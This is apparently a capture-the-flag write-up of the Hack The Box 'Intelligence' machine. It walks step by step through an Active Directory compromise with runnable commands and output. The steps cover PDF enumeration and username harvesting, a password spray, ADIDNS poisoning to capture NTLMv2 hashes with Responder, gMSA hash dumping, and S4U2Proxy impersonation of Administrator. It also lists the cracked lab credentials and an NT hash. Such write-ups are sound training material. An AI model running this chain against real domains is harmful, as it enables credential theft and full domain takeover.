Intelligence
IP: 10.10.10.248 | Difficulty: Medium | OS: Windows
Environment Setup
export IP=10.10.10.248
echo "10.10.10.248 intelligence.htb dc.intelligence.htb" >> /etc/hosts
Step 1 — Reconnaissance
Why: Identify open services and domain structure before selecting attack vectors.
nmap -sC -sV -p- --min-rate 10000 -oA nmap/intelligence 10.10.10.248
Output:
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
636/tcp open ldapssl
3268/tcp open globalcatLDAP
5985/tcp open http (WinRM)
Key findings:
- Domain:
intelligence.htb— DC:dc.intelligence.htb - HTTP on 80, Kerberos on 88, SMB on 445, LDAP on 389/636, WinRM on 5985 — full AD exposure
Step 2 — HTTP — Date-Based Document Enumeration
Why: The web server hosts PDF documents at predictable date-stamped paths. A brute-force script reveals 84 accessible documents across two years.
#!/usr/bin/env python3
import requests
from datetime import date, timedelta
start = date(2020, 1, 1)
end = date(2021, 12, 31)
d = start
while d <= end:
url = f"http://intelligence.htb/documents/{d.strftime('%Y-%m-%d')}-upload.pdf"
r = requests.get(url, timeout=5)
if r.status_code == 200:
print(f"[+] {url}")
d += timedelta(days=1)
Output: 84 PDFs found, date range 2020-01-01 through 2021-03-17.
Key findings:
- Unauthenticated access to internal company PDFs via IDOR-style date enumeration
- Documents uploaded by different employees — metadata will expose AD usernames
Step 3 — PDF Metadata — Creator Harvesting
Why: PDF Creator metadata contains Active Directory usernames. Bulk extraction builds a valid user list for Kerberos enumeration.
for url in $(cat found-docs.txt); do wget -q "$url" -P pdfs/; done
exiftool pdfs/*.pdf | grep -i '^Creator' | awk '{print $3}' | sort -u > users.txt
Output:
Anita.Roberts Brian.Morris Daniel.Shelton
David.Mcbride David.Reed Ian.Duncan
Jason.Patterson Jennifer.Thomas Jessica.Moody
Jose.Williams Kaitlyn.Zimmerman Kelly.Long
Nicole.Brock Richard.Williams Samuel.Richardson
Scott.Scott Stephanie.Young Ted.Graves
Teresa.Williamson Thomas.Valenzuela Tiffany.Molina
William.Lee
Key findings: 22 unique AD usernames in Firstname.Lastname format harvested from PDF Creator fields.
Step 4 — Kerbrute — Validate AD Usernames
Why: Confirm active domain accounts against Kerberos before spraying to avoid lockouts.
kerbrute userenum --dc dc.intelligence.htb -d intelligence.htb users.txt
Key findings: All 22 usernames validated as active domain accounts.
Step 5 — PDF Content — Default Password Discovery
Why: One of the harvested PDFs (2020-06-04) is an IT policy document announcing the company default password for new accounts.
pdftotext pdfs/2020-06-04-upload.pdf -
Key findings: Please change your default password: NewIntelligenceCorpUser9876
Step 6 — Password Spray — Tiffany.Molina
Why: New accounts may not have changed the default password. Spray all 22 validated users with one password to stay below lockout thresholds.
crackmapexec smb intelligence.htb -u users.txt -p 'NewIntelligenceCorpUser9876' --continue-on-success
Output:
SMB 10.10.10.248 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
Key findings: Valid foothold: Tiffany.Molina:NewIntelligenceCorpUser9876
Step 7 — SMB Enumeration — IT Share
Why: Authenticated SMB enumeration reveals a readable IT share containing a scheduled PowerShell script that becomes our NTLM relay vector.
smbclient //intelligence.htb/IT -U 'Tiffany.Molina%NewIntelligenceCorpUser9876'
smb: \> get downdetector.ps1
Output:
foreach($record in Get-ChildItem "AD:DC=intelligence.htb" | Where-Object Name -like "web*") {
$r = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
}
Key findings:
- Script runs as
Ted.Gravesevery 5 minutes, queries AD DNS forweb*records, makes authenticated HTTP requests -UseDefaultCredentials= NTLMv2 — capturable with Responder if we own a matching DNS record
Step 8 — ADIDNS Poisoning — Rogue DNS Record
Why: Tiffany.Molina has DNS write permissions (standard domain user privilege). Adding a web* A record pointing to our IP forces Ted.Graves's script to authenticate against our Responder.
python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' \
--record 'webattacker' --action add --data 10.10.14.X dc.intelligence.htb
Output:
[+] Bind OK
[+] LDAP operation completed successfully
nslookup webattacker.intelligence.htb 10.10.10.248
# webattacker.intelligence.htb = 10.10.14.X ✓
Key findings: DNS A record added — Ted.Graves's task will authenticate to us on next run.
Step 9 — Responder — NTLMv2 Hash Capture
Why: Responder captures the NTLMv2 challenge-response when Ted.Graves authenticates to our rogue DNS entry. Crack offline.
sudo responder -I tun0
# Wait ~5 min for scheduled task to fire
Output:
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:<challenge>:<response>:<challenge2>
hashcat -m 5600 ted.hash /usr/share/wordlists/rockyou.txt
Key findings: Cracked: Ted.Graves:Mr.Teddy
Step 10 — BloodHound — ACL Mapping
Why: BloodHound maps the full escalation path from Ted.Graves to Domain Admin via AD ACL relationships.
bloodhound-python -u 'Ted.Graves' -p 'Mr.Teddy' -ns 10.10.10.248 -d intelligence.htb -c all
Output:
Ted.Graves → MemberOf → ITSUPPORT
ITSUPPORT → ReadGMSAPassword → svc_int$
svc_int$ → AllowedToDelegate → HTTP/dc.intelligence.htb
→ Impersonate Administrator
Key findings:
- ITSUPPORT has ReadGMSAPassword on
svc_int$— NTLM hash is recoverable svc_int$has constrained delegation to HTTP/dc — S4U2Proxy to Domain Admin
Step 11 — gMSADumper — Recover svc_int$ Hash
Why: ITSUPPORT has ReadGMSAPassword over svc_int$. gMSADumper reads the managed account's NTLM hash from LDAP.
python3 gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d intelligence.htb
Output:
svc_int$:::33bd09dcd697600edf6b3a7af4875767
Key findings: svc_int$ NT hash recovered. Service account has AllowedToDelegate to HTTP/dc.intelligence.htb.
Step 12 — S4U2Proxy — Forge Administrator Ticket
Why: svc_int$ has constrained delegation to dc.intelligence.htb/HTTP. getST.py performs S4U2Proxy to impersonate Administrator.
python3 getST.py intelligence.htb/svc_int$ -hashes :33bd09dcd697600edf6b3a7af4875767 \
-spn WWW/dc.intelligence.htb -impersonate Administrator
export KRB5CCNAME=Administrator.ccache
Output:
[*] Impersonating Administrator
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
Key findings: Kerberos ticket forged for Administrator — ready for pass-the-ticket.
Step 13 — WMIExec — Administrator Shell
Why: The forged ccache grants full Domain Admin access. wmiexec authenticates via Kerberos without a password.
python3 wmiexec.py -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb
Output:
C:\> whoami
intelligence\administrator
C:\Users\Administrator\Desktop> type root.txt
<REDACTED>
Key findings: 🏴 MACHINE PWNED — DOMAIN ADMIN ACHIEVED
Credentials
| Account | Secret |
|---|---|
| Tiffany.Molina | NewIntelligenceCorpUser9876 |
| Ted.Graves | Mr.Teddy |
| svc_int$ | 33bd09dcd697600edf6b3a7af4875767 (NT) |
Full Attack Chain
HTTP /documents/ date brute-force → 84 PDFs
└─ exiftool PDF Creator metadata → 22 AD usernames
└─ 2020-06-04-upload.pdf → default: NewIntelligenceCorpUser9876
└─ Password spray → Tiffany.Molina:NewIntelligenceCorpUser9876
└─ SMB //IT/downdetector.ps1 → runs as Ted.Graves, queries web* DNS
└─ dnstool.py ADIDNS add webattacker A → 10.10.14.X
└─ Responder NTLMv2 → Ted.Graves:Mr.Teddy
└─ BloodHound: ITSUPPORT → ReadGMSAPassword → svc_int$
└─ gMSADumper → svc_int$ NT hash
└─ getST.py S4U2Proxy -impersonate Administrator
└─ wmiexec -k → DA shell
🏴 ROOTED
© 0xNRG — Intelligence pwned — 2022-01-08